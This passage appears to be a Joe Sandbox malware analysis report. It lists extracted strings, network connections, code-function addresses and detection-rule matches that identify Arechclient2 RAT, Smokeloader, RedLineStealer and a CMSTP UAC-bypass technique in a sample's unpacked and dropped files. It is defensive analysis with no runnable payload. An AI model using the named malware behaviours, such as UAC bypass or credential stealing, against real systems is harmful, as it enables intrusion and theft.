0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                              Source: MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/about/
                              Source: u3bs.0.exe, 00000001.00000003.2563120813.0000000005CC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                              Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/about/t.exe
                              Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                              Source: u3bs.0.exe, 00000001.00000003.2563120813.0000000005CC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                              Source: u3bs.0.exe, 00000001.00000003.2563120813.0000000005CC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                              Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                              Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                              Source: u3bs.0.exe, 00000001.00000003.2563120813.0000000005CC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                              Source: unknownHTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49757 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 169.150.236.99:443 -> 192.168.2.4:49761 version: TLS 1.2
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_0009C8B0 GetClientRect,GetDC,CreateCompatibleBitmap,GetDC,CreateCompatibleDC,BitBlt,5_2_0009C8B0

                              System Summary

                              barindex
                              Source: 14.2.cmd.exe.5d800c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                              Source: 5.2.run.exe.3c1a15b.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 14.2.cmd.exe.5d800c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                              Source: 14.2.cmd.exe.57b4e64.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 6.2.cmd.exe.60b00c8.8.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                              Source: 13.2.run.exe.3ea215b.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 5.2.run.exe.3bd686d.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 6.2.cmd.exe.60b00c8.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                              Source: 6.2.cmd.exe.56bbe64.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 13.2.run.exe.3e5e86d.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 27.2.MSBuild.exe.1370000.0.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                              Source: 14.2.cmd.exe.5770976.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 13.2.run.exe.3ea2d5b.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 6.2.cmd.exe.56bb264.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 6.2.cmd.exe.5677976.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 5.2.run.exe.3c1ad5b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 14.2.cmd.exe.57b4264.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                              Source: 00000001.00000002.2974851008.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                              Source: 00000001.00000002.2975209039.0000000004314000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                              Source: 00000000.00000002.2972573005.0000000004265000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                              Source: C:\Users\user\AppData\Local\Temp\bxhlahunbhc, type: DROPPEDMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                              Source: C:\Users\user\AppData\Local\Temp\osssciedmed, type: DROPPEDMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B07F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,1_2_6B07F280
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0DB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,1_2_6B0DB910
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0DB8C0 rand_s,NtQueryVirtualMemory,1_2_6B0DB8C0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0DB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,1_2_6B0DB700
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B09ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,1_2_6B09ED10
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_004278800_2_00427880
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_0040B8AE0_2_0040B8AE
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_0040C1910_2_0040C191
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_004123A00_2_004123A0
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_0040F4410_2_0040F441
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_0040C44C0_2_0040C44C
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_0042140C0_2_0042140C
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_0040BC200_2_0040BC20
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_0041BE390_2_0041BE39
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_0040BECA0_2_0040BECA
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_004087610_2_00408761
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_0041B7220_2_0041B722
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_0040C7FC0_2_0040C7FC
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05CFBE870_2_05CFBE87
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05CFF6A80_2_05CFF6A8
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05CFC6B30_2_05CFC6B3
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05D026070_2_05D02607
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05CF89C80_2_05CF89C8
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05D0B9890_2_05D0B989
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05CFC1310_2_05CFC131
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05CFC3F80_2_05CFC3F8
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05CFBB150_2_05CFBB15
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05CFCA630_2_05CFCA63
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0735A01_2_6B0735A0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0BD3201_2_6B0BD320
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0753401_2_6B075340
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B08C3701_2_6B08C370
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B07F3801_2_6B07F380
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0E53C81_2_6B0E53C8
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0B9A601_2_6B0B9A60
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0EBA901_2_6B0EBA90
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0722A01_2_6B0722A0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0A4AA01_2_6B0A4AA0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B08CAB01_2_6B08CAB0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0E2AB01_2_6B0E2AB0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0B8AC01_2_6B0B8AC0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B091AF01_2_6B091AF0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0BE2F01_2_6B0BE2F0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B09A9401_2_6B09A940
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B08D9601_2_6B08D960
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0CB9701_2_6B0CB970
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0EB1701_2_6B0EB170
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0B51901_2_6B0B5190
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0D29901_2_6B0D2990
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B07C9A01_2_6B07C9A0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0AD9B01_2_6B0AD9B0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0878101_2_6B087810
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0BB8201_2_6B0BB820
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0C48201_2_6B0C4820
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0988501_2_6B098850
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B09D8501_2_6B09D850
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0BF0701_2_6B0BF070
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0A60A01_2_6B0A60A0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0E50C71_2_6B0E50C7
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B09C0E01_2_6B09C0E0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0B58E01_2_6B0B58E0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B089F001_2_6B089F00
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0B77101_2_6B0B7710
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0C77A01_2_6B0C77A0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B07DFE01_2_6B07DFE0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0A6FF01_2_6B0A6FF0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0C56001_2_6B0C5600
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0B7E101_2_6B0B7E10
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0D9E301_2_6B0D9E30
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0C2E4E1_2_6B0C2E4E
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0946401_2_6B094640
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B099E501_2_6B099E50
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0B3E501_2_6B0B3E50
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0E6E631_2_6B0E6E63
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B07C6701_2_6B07C670
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0DE6801_2_6B0DE680
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B095E901_2_6B095E90
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0D4EA01_2_6B0D4EA0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0E76E31_2_6B0E76E3
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B07BEF01_2_6B07BEF0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B08FEF01_2_6B08FEF0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B08FD001_2_6B08FD00
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0A05121_2_6B0A0512
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B09ED101_2_6B09ED10
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0B0DD01_2_6B0B0DD0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0D85F01_2_6B0D85F0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0EAC001_2_6B0EAC00
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0B5C101_2_6B0B5C10
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0C2C101_2_6B0C2C10
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0E542B1_2_6B0E542B
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0854401_2_6B085440
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0E545C1_2_6B0E545C
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B086C801_2_6B086C80
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0D34A01_2_6B0D34A0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0DC4A01_2_6B0DC4A0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0864C01_2_6B0864C0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B09D4D01_2_6B09D4D0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B07D4E01_2_6B07D4E0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0B6CF01_2_6B0B6CF0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C66AC601_2_6C66AC60
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C73AC301_2_6C73AC30
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C726C001_2_6C726C00
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C65ECC01_2_6C65ECC0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6BECD01_2_6C6BECD0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C72ED701_2_6C72ED70
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C78AD501_2_6C78AD50
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C7E8D201_2_6C7E8D20
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C7ECDC01_2_6C7ECDC0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C664DB01_2_6C664DB0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6F6D901_2_6C6F6D90
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6FEE701_2_6C6FEE70
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C740E201_2_6C740E20
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C66AEC01_2_6C66AEC0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C700EC01_2_6C700EC0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6E6E901_2_6C6E6E90
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C722F701_2_6C722F70
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6CEF401_2_6C6CEF40
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C7A0F201_2_6C7A0F20
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C666F101_2_6C666F10
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C73EFF01_2_6C73EFF0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C660FE01_2_6C660FE0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C7A8FB01_2_6C7A8FB0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C66EFB01_2_6C66EFB0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C7348401_2_6C734840
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6B08201_2_6C6B0820
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6EA8201_2_6C6EA820
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C7668E01_2_6C7668E0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6989601_2_6C698960
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6B69001_2_6C6B6900
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C77C9E01_2_6C77C9E0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6949F01_2_6C6949F0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C7209B01_2_6C7209B0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6F09A01_2_6C6F09A0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C71A9A01_2_6C71A9A0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6DCA701_2_6C6DCA70
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C718A301_2_6C718A30
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C70EA001_2_6C70EA00
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6DEA801_2_6C6DEA80
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C766BE01_2_6C766BE0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C700BA01_2_6C700BA0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6784601_2_6C678460
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6C44201_2_6C6C4420
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6EA4301_2_6C6EA430
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6A64D01_2_6C6A64D0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6FA4D01_2_6C6FA4D0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C78A4801_2_6C78A480
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C7005701_2_6C700570
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6C25601_2_6C6C2560
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C7A85501_2_6C7A8550
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6B85401_2_6C6B8540
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C7645401_2_6C764540
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C72A5E01_2_6C72A5E0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6EE5F01_2_6C6EE5F0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_0009F8405_2_0009F840
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_000840605_2_00084060
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_000821205_2_00082120
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_000A61305_2_000A6130
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_0009B1505_2_0009B150
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_000D9A005_2_000D9A00
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_000CCAA05_2_000CCAA0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_000943905_2_00094390
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_000A03905_2_000A0390
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_000AFC105_2_000AFC10
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_000D55505_2_000D5550
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_0008D5705_2_0008D570
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_000D96E05_2_000D96E0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_0008A6F05_2_0008A6F0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_000A66F05_2_000A66F0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_000837B05_2_000837B0
                              Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
